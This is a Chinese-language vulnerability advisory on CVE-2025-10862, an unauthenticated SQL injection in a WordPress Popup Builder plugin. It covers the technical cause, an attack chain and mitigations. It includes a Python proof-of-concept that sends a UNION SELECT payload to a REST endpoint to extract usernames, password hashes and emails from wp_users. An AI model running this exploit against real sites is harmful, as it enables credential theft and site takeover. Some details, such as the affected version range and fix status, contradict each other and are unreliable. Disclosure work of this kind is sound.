CVE-2025-10862：WordPress Popup Builder插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-10862

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Popup Builder with Gamification, Multi-Step Popups, Page-Level Targeting, and WooCommerce Triggers (WordPress插件)

漏洞概述

CVE-2025-10862是WordPress平台上Popup Builder插件中存在的一个高危SQL注入漏洞。该插件是一款广泛使用的弹窗构建工具，集成了游戏化机制、多步骤弹窗、页面级定位以及WooCommerce触发器等功能，主要用于网站营销和用户互动场景。该漏洞存在于插件的所有版本中，最高影响至2.1.3版本。

根据CVSS 3.1评分体系，该漏洞获得7.5分的高危评级。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何权限认证（PR:N），也无需用户交互（UI:N），对机密性产生高影响（C:H），但对完整性和可用性无影响。该漏洞由Wordfence安全团队的安全研究员发现并报告。

此漏洞的核心问题在于插件对用户提供的'id'参数缺乏充分的转义处理，并且在构造SQL查询时没有使用参数化查询或预编译语句，导致未经认证的攻击者可以通过精心构造的恶意SQL语句注入到现有查询中。由于无需认证即可利用，且攻击复杂度极低，该漏洞对使用此插件的WordPress网站构成了严重的安全威胁，攻击者可能通过该漏洞提取数据库中的敏感信息，包括用户凭证、个人数据等。

技术细节

该SQL注入漏洞存在于Popup Builder插件的多个代码位置中，主要涉及两个关键文件：includes/Helpers/DataBase.php（第374行附近）和includes/Routes/Popup.php（第232行附近）。

漏洞的技术原理如下：

1. **参数处理缺陷**：插件在处理用户请求时，直接将HTTP请求中的'id'参数传递到SQL查询中，而没有对该参数进行适当的转义或验证。当用户传入类似`' OR '1'='1`这样的恶意字符串时，SQL语句的结构会被改变。

2. **查询构造问题**：插件使用字符串拼接的方式构造SQL查询语句，而非使用WordPress推荐的$wpdb->prepare()方法进行参数化查询。这使得攻击者可以通过闭合原有的SQL语句片段，附加额外的SQL查询。

3. **利用方式**：由于漏洞存在于未认证可访问的路由中（Popup.php路由），未经认证的远程攻击者可以通过发送特制的HTTP请求，利用UNION SELECT等技术从数据库中提取敏感数据。

4. **数据泄露风险**：通过利用此漏洞，攻击者可以查询wp_users表获取管理员凭证哈希，查询wp_options表获取网站配置信息，甚至可能获取到存储在数据库中的其他敏感业务数据。

该漏洞的修复方式是在查询中使用$wpdb->prepare()进行参数绑定，并对用户输入进行严格的类型验证和过滤。

攻击链分析

STEP 1

步骤1：目标识别

攻击者使用搜索引擎或WordPress指纹识别工具（如WPScan）扫描互联网上的WordPress网站，识别安装了Popup Builder插件（版本<=2.1.3）的目标网站。

STEP 2

步骤2：漏洞探测

攻击者向目标网站的Popup Builder相关REST API端点发送带有恶意'id'参数的HTTP请求，探测是否存在SQL注入漏洞。常见的注入测试payload包括单引号、OR条件、UNION SELECT等。

STEP 3

步骤3：注入Payload构造

攻击者构造精心设计的SQL注入payload，利用UNION SELECT技术将额外的SQL查询附加到原有查询中，用于提取数据库中的敏感信息。

STEP 4

步骤4：数据提取

通过发送注入请求，攻击者从WordPress数据库中提取敏感信息，包括管理员用户名、密码哈希、电子邮件地址等关键凭证。

STEP 5

步骤5：权限提升与后续攻击

利用获取的管理员凭证哈希，攻击者可以离线破解密码，然后登录WordPress后台，进一步执行网站篡改、恶意代码植入、横向移动等攻击行为。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10862 PoC - SQL Injection in Popup Builder WordPress Plugin
# Vulnerable parameter: id
# Affected versions: <= 2.1.3

import requests

# Target WordPress site with vulnerable Popup Builder plugin
target_url = "http://target-wordpress-site.com"

# Vulnerable endpoint (based on includes/Routes/Popup.php)
vulnerable_endpoint = "/wp-json/popup-builder/v1/popup"

# SQL injection payload targeting the 'id' parameter
# The injection appends additional SQL queries to extract sensitive information
payload = "1 UNION SELECT user_login, user_pass, user_email FROM wp_users-- -"

# Construct the exploit URL
# The 'id' parameter is vulnerable due to insufficient escaping
params = {
    "id": payload
}

# Send the malicious request (no authentication required)
response = requests.get(
    target_url + vulnerable_endpoint,
    params=params,
    headers={
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
)

# Check response for extracted data
if response.status_code == 200:
    print("[+] SQL Injection successful!")
    print("[+] Response data:")
    print(response.text)
else:
    print(f"[-] Request failed with status code: {response.status_code}")
    print(f"[-] Response: {response.text}")

# Alternative payload using time-based blind SQL injection
# time_based_payload = "1 AND SLEEP(5)-- -"
# This can be used to confirm the vulnerability if data is not directly returned

影响范围

Popup Builder WordPress Plugin < 2.1.3

Popup Builder WordPress Plugin <= 2.1.3

防御指南

临时缓解措施

在等待官方修复版本发布期间，建议采取以下临时缓解措施：1）通过WordPress管理后台暂时禁用Popup Builder插件；2）在Web服务器层面配置WAF规则，阻止包含SQL注入特征的请求（如包含UNION SELECT、SLEEP等关键词的请求）；3）限制对Popup Builder相关REST API端点的访问；4）监控数据库日志，检测异常查询活动；5）定期备份WordPress数据库，以便在遭受攻击后能够快速恢复。